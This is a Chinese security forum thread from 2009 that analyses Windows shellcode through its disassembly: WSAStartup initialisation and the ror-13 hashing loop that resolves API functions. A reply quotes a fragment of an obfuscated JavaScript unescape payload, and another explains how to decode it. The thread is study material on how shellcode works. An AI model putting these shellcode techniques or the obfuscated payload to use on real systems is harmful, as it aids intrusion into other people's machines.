首页
社区
课程
招聘
[原创]从执行流程看shellcode(一)[附源代码]
发表于: 2009-2-18 20:37 8267

[原创]从执行流程看shellcode(一)[附源代码]

2009-2-18 20:37
8267

1、shellcode初始化代码

00401000 > $  8D85 70FEFFFF lea     eax, dword ptr [ebp-190]         ;  shellcode初始化代码
00401006   .  50            push    eax                              ; /pWSAData
00401007   .  68 01010000   push    101                              ; |RequestedVersion = 101 (1.1.)
0040100C   .  FF15 18504000 call    dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
00401020   .  EB 54         jmp     short 00401076            -------------------
00401022  /$  8B75 3C       mov     esi, dword ptr [ebp+3C]                      |
00401025  |.  8B7435 78     mov     esi, dword ptr [ebp+esi+78]                  |
00401029  |.  03F5          add     esi, ebp                                     |
0040102B  |.  56            push    esi                                          |
0040102C  |.  8B76 20       mov     esi, dword ptr [esi+20]
0040102F  |.  03F5          add     esi, ebp
00401031  |.  33C9          xor     ecx, ecx
00401033  |.  49            dec     ecx
00401034  |>  41            /inc     ecx
00401035  |.  AD            |lods    dword ptr [esi]                   这部分就是获取函数的运算部分
00401036  |.  33DB          |xor     ebx, ebx
00401038  |>  36:0FBE1428   |/movsx   edx, byte ptr ss:[eax+ebp]
0040103D  |.  38F2          ||cmp     dl, dh
0040103F  |.  74 08         ||je      short 00401049
00401041  |.  C1CB 0D       ||ror     ebx, 0D
00401044  |.  03DA          ||add     ebx, edx                                   |
00401046  |.  40            ||inc     eax                                        |
00401047  |.^ EB EF         |\jmp     short 00401038                             |
00401049  |>  3BDF          |cmp     ebx, edi                                    |
0040104B  |.^ 75 E7         \jnz     short 00401034   ----------------------------

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (5)
雪    币: 2181
活跃值: (114)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
复活了,有压力就不偷懒
2009-2-18 20:50
0
雪    币: 75
活跃值: (808)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
3
var huoqiang=window["unescape"](""+"%u54EB"+"疋"+"謼"+"㕴"+"͸"+"囵"+"皋"+"̠"+"%

u33F5"+"䧉"+"굁"+""+"༶"+"ᒾ"+"㠨"+"瓲"+"섈"+"෋"+""+""+"%

u3BEF"+"痟"+"廧"+"庋"+"̤"+"曝"+"ಋ"+"譋"+"ᱞ"+""+"ҋ"+"΋"+"%

uC3C5"+"牵"+"浬"+"湯"+"搮"+"汬"+"䌀"+"尺"+"⹕"+"硥"+"e쀳"+"ͤ"+"%

u3040"+"౸"+"Ј"+"B"+"ࢰ"+"C"+"%u"+"1C7"+"0ࢺ"+"D"+"„"+"0"+"ž"+"BЈ"+"B"+"%

u8D3"+"4%"+"u7C4"+"0"+"Ј"+"B"+"锼"+"躿"+"๎"+""+"ト￿"+""+"茄"+"␬"+"%

弱弱的问句,为啥源代码是这样的。。完全糊涂
2009-2-19 11:09
0
雪    币: 109
活跃值: (538)
能力值: ( LV12,RANK:220 )
在线值:
发帖
回帖
粉丝
4
书生 不是 是 你自己的 产物吧。。
2009-2-21 17:35
0
雪    币: 309
活跃值: (15)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
5
书生。。我要跟你学病毒。。。
2009-2-21 19:34
0
雪    币: 349
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
[QUOTE=skypismire;580186]var huoqiang=window["unescape"](""+"%u54EB"+"疋"+"謼"+"?"+"?"+"囵"+"...[/QUOTE]

要先倒序操作...呵呵....哫...变成0xEB 0x54.然后通过JScript.dll里自带的函数DecodeBase64还原成明文
2009-2-23 00:01
0
游客
登录 | 注册 方可回帖
返回
//